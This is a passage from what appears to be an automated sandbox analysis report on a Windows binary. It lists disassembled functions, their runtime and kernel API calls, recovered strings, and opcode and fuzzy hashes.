                                                                        • Part of subcall function 00D8780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D8788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 2348759532-1402515088
                                                                      • Opcode ID: 6ade29e9279643c5679760c09b4c177836d2803ef789d730ffcd0eb294d86bef
                                                                      • Instruction ID: f6e533b58d15ec611b8f8d4b93d5b4ae21efb1be3bdd1bb407a1bc119ae9fdac
                                                                      • Opcode Fuzzy Hash: 6ade29e9279643c5679760c09b4c177836d2803ef789d730ffcd0eb294d86bef
                                                                      • Instruction Fuzzy Hash: 0B514A71D00249EBCF05EFE4D885AEDBBB9FF08300F208559E546AB295EB349905CFA4
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D92595
                                                                      • _swprintf.LIBCMT ref: 00D9260D
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B52D
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B550
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B578
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 1487807907-1402515088
                                                                      • Opcode ID: 5499c76c979ff51820909e1c100b97374e23c7b23e3c879b483747f3ffbf6b67
                                                                      • Instruction ID: 1b33cedc087aaf26a0ee831b70320a57dd5b441b8da11e614d1eabc616e9a750
                                                                      • Opcode Fuzzy Hash: 5499c76c979ff51820909e1c100b97374e23c7b23e3c879b483747f3ffbf6b67
                                                                      • Instruction Fuzzy Hash: 9B515C71D00249EBCF05DFE4D895AEDBBB9FF08300F208519E546AB295EB359905CF60
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D9660E
                                                                      • _swprintf.LIBCMT ref: 00D96686
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5BD
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5E0
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C608
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 1487807907-1402515088
                                                                      • Opcode ID: d8f9a94c7cc552bdec562eedd53f230e0ec87bdff3a7742ac915cf8cfc882ad0
                                                                      • Instruction ID: 41cc729d00c0da7a0a1d2cbfa3ce7ee540a58f8f22b912783ed87040c651ac76
                                                                      • Opcode Fuzzy Hash: d8f9a94c7cc552bdec562eedd53f230e0ec87bdff3a7742ac915cf8cfc882ad0
                                                                      • Instruction Fuzzy Hash: 8D514771D00209EBDF09DFE4D885ADDBBB9FB08700F20855AE506AB2A5EB359915CF60
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \\?\$\\?\UNC\
                                                                      • API String ID: 0-3019864461
                                                                      • Opcode ID: f6510211b239f031668979890ec5a6071ca427a704b347485b63abbab83980b8
                                                                      • Instruction ID: de4f198d5bd13d51906beb583bb68440ff2b90c5bb385ae24a26aee5a64e91c4
                                                                      • Opcode Fuzzy Hash: f6510211b239f031668979890ec5a6071ca427a704b347485b63abbab83980b8
                                                                      • Instruction Fuzzy Hash: 8651D2719102049BDB14CF68C895BAEF7F5FF95314F10861EE406B7280EB75A988CBB0
                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 00D9B5F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 2118026453-2084237596
                                                                      • Opcode ID: 1363626e6215c34a6f4c0d5cee6e341c45ba9fd96268371236a1f3e678ae8819
                                                                      • Instruction ID: 0bef67379d42acd3b7f4ffa3281614b8a7803a846d178c7e8521e3eae3d4eb1b
                                                                      • Opcode Fuzzy Hash: 1363626e6215c34a6f4c0d5cee6e341c45ba9fd96268371236a1f3e678ae8819
                                                                      • Instruction Fuzzy Hash: 13417B71900209AFCF15CF98DE85AEEBBB5FF48314F19815AF9046B211D735A950DB60
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D92183
                                                                        • Part of subcall function 00D8780A: __EH_prolog3.LIBCMT ref: 00D87811
                                                                        • Part of subcall function 00D8780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D8781B
                                                                        • Part of subcall function 00D8780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D8788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                      • String ID: %.0Lf$0123456789-
                                                                      • API String ID: 2728201062-3094241602
                                                                      • Opcode ID: c4748352d71c4761728da1cfdf05a0e48af058f07f3811d7390c2447f50dd57c
                                                                      • Instruction ID: ac04f216037d5db377370032f2f9a813757918366d9e86b1cc94c4bd196bfd05
                                                                      • Opcode Fuzzy Hash: c4748352d71c4761728da1cfdf05a0e48af058f07f3811d7390c2447f50dd57c
                                                                      • Instruction Fuzzy Hash: 6D414B31900219EFCF15EFA8C8819EDBBB5FF09310F144159E811AB251DB309956CB79
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D964E2
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5BD
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5E0
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C608
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                      • String ID: 0123456789-$0123456789-
                                                                      • API String ID: 2088892359-2494171821
                                                                      • Opcode ID: 14418e82ab6c730d28617a45dfe1a57f91209dac65b7e61159a70ce85c91623c
                                                                      • Instruction ID: 2bf835fef67d607dfd47e2d20bbd1e2cc291949f8b7a787f67da2778e75c1e40
                                                                      • Opcode Fuzzy Hash: 14418e82ab6c730d28617a45dfe1a57f91209dac65b7e61159a70ce85c91623c
                                                                      • Instruction Fuzzy Hash: C8415B31900209EFCF09EFA8D8919EE7BB5EF09310F11405AF415A7255EB35DA15CB65
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D92467
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B52D
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B550
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B578
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                      • String ID: 0123456789-$0123456789-
                                                                      • API String ID: 2088892359-2494171821
                                                                      • Opcode ID: dfb41d71123c264cd424bfb6bccbdaad971ab29496499a01630aa267204f73bb
                                                                      • Instruction ID: 251a850bcbbd870654717da9ddd6bca46a760b3bb117de3719e1d60484b5e3c4
                                                                      • Opcode Fuzzy Hash: dfb41d71123c264cd424bfb6bccbdaad971ab29496499a01630aa267204f73bb
                                                                      • Instruction Fuzzy Hash: 5E415931900218EFCF15EFA8D8919EDBBB5FF08310F15416AF805AB251EB309A56DB75
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3___cftoe
                                                                      • String ID: !%x
                                                                      • API String ID: 855520168-1893981228
                                                                      • Opcode ID: c64d24dc69608c15fe4346438c2c095d12c9a6fe4cc919b18903808fa595ceb3
                                                                      • Instruction ID: 05c4f612d327da18af564960eaa11770e0a5b54615e25861e44304b6aa1138c3
                                                                      • Opcode Fuzzy Hash: c64d24dc69608c15fe4346438c2c095d12c9a6fe4cc919b18903808fa595ceb3
                                                                      • Instruction Fuzzy Hash: 3C41F474A11249EFDF05DFA8D881AEEBBB1BF08304F144429F955A7352E7349A05CBB1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3___cftoe
                                                                      • String ID: !%x
                                                                      • API String ID: 855520168-1893981228
                                                                      • Opcode ID: e9a382dd7779d786bb3d04e71e42cfd3bda5270db095c58d62d24b7a9f260960
                                                                      • Instruction ID: 7267091d5f0582d66ea1549467fea138074b19a027690cd253194e33f2c3a81a
                                                                      • Opcode Fuzzy Hash: e9a382dd7779d786bb3d04e71e42cfd3bda5270db095c58d62d24b7a9f260960
                                                                      • Instruction Fuzzy Hash: 19313A75A10209EBDF04DFA8D981AEEB7B2FF48304F208429F945AB251E7349E05CB74
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 2a20b40053c91f0dc845d2ec18491119570b181c5838c32b273ac96a6192c311
                                                                      • Instruction ID: 2e9ede4588ad06aa48c396c85ebb67de9baa6c9543b6b0cec40505eb81e39c36
                                                                      • Opcode Fuzzy Hash: 2a20b40053c91f0dc845d2ec18491119570b181c5838c32b273ac96a6192c311
                                                                      • Instruction Fuzzy Hash: 1421A0711083489FD711CF18C859B9BBBEAAF89304F04855DF99897292E634D918C7B2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 6f88d198558d8ab4b058d3535e4e59afec3b3f4d966ee9a7abe5a0144b862a17
                                                                      • Instruction ID: ddfe9668adbe5cc82e93e5215bc0c7dffd4a8043e092d7842399d92123f33710
                                                                      • Opcode Fuzzy Hash: 6f88d198558d8ab4b058d3535e4e59afec3b3f4d966ee9a7abe5a0144b862a17
                                                                      • Instruction Fuzzy Hash: F721D1752083459FE715CF14C845B9BBBEAEF85300F048819F99587292D634D908C7B6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 0fd706b1745311200e52e22e8fd6f30941070ea5f47bba5888b2df3f4d23b3e4
                                                                      • Instruction ID: 28cd8519e7768eec5c4154ad1c6e7b59ff26322fe5671a49f0064f604a08c431
                                                                      • Opcode Fuzzy Hash: 0fd706b1745311200e52e22e8fd6f30941070ea5f47bba5888b2df3f4d23b3e4
                                                                      • Instruction Fuzzy Hash: 9521AE712083459FE711CF18C845B9BBBEAEF89300F08881DF99897292D634D918CBB7
                                                                      APIs
                                                                      • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00D78116
                                                                      • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,862265DA), ref: 00D78185
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ConvertFreeLocalString
                                                                      • String ID: Invalid SID
                                                                      • API String ID: 3201929900-130637731
                                                                      • Opcode ID: 3e93d963ec8f3c64722a96edd3fccb4487f97c40b1fb25e95f5bb139d18bd2db
                                                                      • Instruction ID: eca85cb0f4e3c2c42d35948e4926eba65cd500a79923058b5ee57e1ae4fc9234
                                                                      • Opcode Fuzzy Hash: 3e93d963ec8f3c64722a96edd3fccb4487f97c40b1fb25e95f5bb139d18bd2db
                                                                      • Instruction Fuzzy Hash: 3F216F74A04305DBDB14DF58C819BAFBBB9EB44B04F14865EE805A7280EBB55A458BA0
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7C16B
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7C1CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3988782225-1405518554
                                                                      • Opcode ID: 8d7821ed3aa807d795fab8a8dd92d94ca8aea2894fd87819f03a84fc55d25e60
                                                                      • Instruction ID: 14228195372baf3d5527b4f96b69f70b5b9a3ec0820902949f745f8190c5bf9e
                                                                      • Opcode Fuzzy Hash: 8d7821ed3aa807d795fab8a8dd92d94ca8aea2894fd87819f03a84fc55d25e60
                                                                      • Instruction Fuzzy Hash: 5621C070805B84DED721CF68C90474BBFF4EF15714F14869EE49597781D3B5AA08CBA1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_
                                                                      • String ID: false$true
                                                                      • API String ID: 2427045233-2658103896
                                                                      • Opcode ID: 1f7b0f3512805048d7daa29979c726d2ded2b1c8cd437bdfc06beb8a4479c679
                                                                      • Instruction ID: adaeefff57ac05a08f234c9785b8b988b16d5adbbdbbae10c222a5edf75d3a5a
                                                                      • Opcode Fuzzy Hash: 1f7b0f3512805048d7daa29979c726d2ded2b1c8cd437bdfc06beb8a4479c679
                                                                      • Instruction Fuzzy Hash: 6111D071900746AEC720EFB4D852B8ABBF4EF19700F04852AE0A68B281EB70E504CB70
                                                                      APIs
                                                                        • Part of subcall function 00D80B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,862265DA,?,00DB93B0,000000FF), ref: 00D80B27
                                                                        • Part of subcall function 00D80B00: GetLastError.KERNEL32(?,00000000,00000000,862265DA,?,00DB93B0,000000FF), ref: 00D80B31
                                                                      • IsDebuggerPresent.KERNEL32(?,?,00DCFAD8), ref: 00D81E48
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00DCFAD8), ref: 00D81E57
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D81E52
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3511171328-631824599
                                                                      • Opcode ID: 1f27a7caf5751043fb0b86ac47cb3845d18c444dace418bfb70f9855d043ac52
                                                                      • Instruction ID: 7f3485809c6a66a9f87b9f33478e32aa1ce02c8a050d24cb9eed6cfaba64257f
                                                                      • Opcode Fuzzy Hash: 1f27a7caf5751043fb0b86ac47cb3845d18c444dace418bfb70f9855d043ac52
                                                                      • Instruction Fuzzy Hash: D9E06574600702CFC361BF29E904786BBE9AB04744F44891DE886C6741FBB4E809CBB2
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,40000022,862265DA,?,00000000,?,?,?,?,00DB9DA0,000000FF,?,00D76432,00000000,?), ref: 00D76CC4
                                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,862265DA,?,00000000,?,?,?,?,00DB9DA0,000000FF,?,00D76432,00000000,?), ref: 00D76CE7
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00DB9DA0,000000FF,?,00D76432,00000000), ref: 00D76D87
                                                                      • LocalFree.KERNEL32(?,862265DA,00000000,00DB93B0,000000FF,?,00000000,00000000,00DB9DA0,000000FF,862265DA), ref: 00D76E0D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 2012307162-0
                                                                      • Opcode ID: a6d862bde760b08dbdfb8e557e227eb0831cd16d63ed7b5619e1060d280e767d
                                                                      • Instruction ID: 509f302dd142811e9d44118086b17522ee881c8f995cdfb45a38cee59e1ae461
                                                                      • Opcode Fuzzy Hash: a6d862bde760b08dbdfb8e557e227eb0831cd16d63ed7b5619e1060d280e767d
                                                                      • Instruction Fuzzy Hash: E1517675A106059FDB18DF68C985AAEBBB5FB48350F14822DE819E7380E731ED10CBA4
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 00D74B05
